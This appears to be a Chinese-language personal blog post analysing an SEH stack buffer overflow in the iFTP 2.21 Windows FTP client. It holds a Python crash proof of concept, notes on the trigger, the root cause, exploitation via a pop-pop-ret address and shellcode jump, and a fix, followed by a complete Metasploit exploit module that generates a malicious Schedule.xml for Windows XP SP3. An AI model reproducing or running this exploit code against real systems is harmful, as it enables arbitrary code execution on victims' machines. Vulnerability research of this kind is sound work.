Yllen | Ring3.xyz

Yllen | Ring3.xyz

要去看埃菲尔铁塔的顶

欢迎关注本人微博:t.cn/RGSLVUk
查看介绍

i.FTP 2.21 - SEH Overflow Crash PoC

# iFTP 2.21 SEH overwritten Crash PoC

# Author: Avinash Kumar Thapa "-Acid"

# Date of Testing :  28th April'2015

# Vendor's home page: http://www.memecode.com/iftp.php

# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe

# Crash Point: Go to Schedule > Schedule download > {+} >Time field

 

 

buffer="A"*600

 

buffer+="BBBB"# Pointer to Next SEH Record

 

buffer+="CCCC"# SEH HANDLER

 

 

file="test.txt"

 

f =open(file, "w")

 

f.write(buffer)

 

f.close()







触发方式:点 Schedule  选择 Schedule download

                 然后将test.txt中内容复制到time 中, 

漏洞起因:软件作者没有考虑到时间只能是固定的 xxxx-xx-xx xx:xx 形式,

               使得用户可以自由控制数据,导致预先设定的缓冲区溢出,从而覆盖了 

上层SEH结构,中途破坏了某些数据结构,从而异常抛出,程序流程被劫持。

利用方式:

            600字节填充 + (pop pop ret)地址填充 SEHandle,

            无DEP 下 可直接

            NextSeh 处填写 跳转到shellcode 指令。

         

漏洞危害

             漏洞触发需要很大的人为因素,故但其危害性很小,算是一个小bug吧。

修复方式:

            时间选择选用控件形式,对外界输入的数据进行安全性检查,比如长度检查。




EXP: 

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

 

require 'msf/core'

require 'rexml/document'

 

classMetasploit3 < Msf::Exploit::Remote

  Rank = NormalRanking

 

  include Msf::Exploit::FILEFORMAT

  include Msf::Exploit::Remote::Seh

  include REXML

 

  definitialize(info = {})

    super(update_info(info,

      'Name'           => 'i-FTP Schedule Buffer Overflow',

      'Description'    => %q{

          This moduleexploits a stack-based buffer overflow vulnerability in

        i-Ftp v2.20, caused by a long time value set forscheduled download.

        By persuading the victim to place a specially-crafted Schedule.xml file

        inthe i-FTPfolder, a remote attacker could execute arbitrary code on

        the system orcause the application to crash. This modulehas been

        tested successfully on Windows XPSP3.

      },

      'License'        => MSF_LICENSE,

      'Author'         =>

        [

          'metacom',      # Vulnerability discovery and PoC

          'Gabor Seljan'  # Metasploit module

        ],

      'References'     =>

        [

          [ 'EDB', '35177'],

          [ 'OSVDB', '114279'],

        ],

      'DefaultOptions'=>

        {

          'ExitFunction'=> 'process'

        },

      'Platform'       => 'win',

      'Payload'        =>

        {

          'BadChars'   => "\x00\x0a\x0d\x20\x22",

          'Space'      => 2000

        },

      'Targets'        =>

        [

          [ 'Windows XP SP3',

            {

              'Offset'=> 600,

              'Ret'    => 0x1001eade  # POP ECX # POP ECX # RET [Lgi.dll]

            }

          ]

        ],

      'Privileged'     => false,

      'DisclosureDate'=> 'Nov 06 2014',

      'DefaultTarget'  => 0))

 

      register_options(

        [

          OptString.new('FILENAME', [ false, 'The file name.', 'Schedule.xml'])

        ],

      self.class)

 

  end

 

  defexploit

 

    evil =  rand_text_alpha(target['Offset'])

    evil << generate_seh_payload(target.ret)

    evil << rand_text_alpha(20000)

 

    xml = Document.new

    xml << XMLDecl.new('1.0', 'UTF-8')

    xml.add_element('Schedule', {})

    xml.elements[1].add_element(

      'Event',

      {

        'Url'=> '',

        'Time'=> 'EVIL',

        'Folder'=> ''

      })

 

    sploit = ''

    xml.write(sploit, 2)

    sploit = sploit.gsub(/EVIL/, evil)

 

    # Create the file

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(sploit)

 

  end

end







评论
© Yllen | Ring3.xyz | Powered by LOFTER